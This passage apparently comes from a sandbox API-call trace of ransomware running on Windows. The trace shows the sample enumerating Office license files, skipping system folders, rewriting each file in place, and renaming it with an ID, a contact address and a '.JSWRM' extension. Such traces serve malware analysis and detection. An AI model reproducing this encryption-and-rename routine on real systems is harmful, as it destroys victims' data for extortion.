lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0103.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0103.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0103.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.768] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0103.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0103.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.769] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe43241ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe43241ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe43bca74, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_OEM_Perp-pl.xrm-ms", cAlternateFileName="HOMEST~1.XRM")) returned 1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.769] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.770] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.770] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2412b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.771] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10659) returned 1 [0103.771] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0103.771] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0103.775] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.775] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0103.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.776] CloseHandle (hObject=0x45c) returned 1 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0103.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0103.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.776] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0103.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0103.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0103.777] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe498c694, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe498c694, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4a4b257, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5466, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="HO8BAE~1.XRM")) returned 1 [0103.777] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0103.777] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0103.777] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.778] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0103.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0103.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.779] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21606) returned 1 [0103.779] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5460) returned 0x24c1d0 [0103.779] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5460, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5460, lpOverlapped=0x0) returned 1 [0103.784] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.784] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5460, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5460, lpOverlapped=0x0) returned 1 [0103.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.784] CloseHandle (hObject=0x45c) returned 1 [0103.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0103.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0103.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0103.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.785] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0103.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0103.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.786] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe43967f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe43967f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe45d2bff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="HOMEST~4.XRM")) returned 1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.786] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.787] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.787] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.787] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.787] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.788] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11612) returned 1 [0103.788] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0103.788] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: 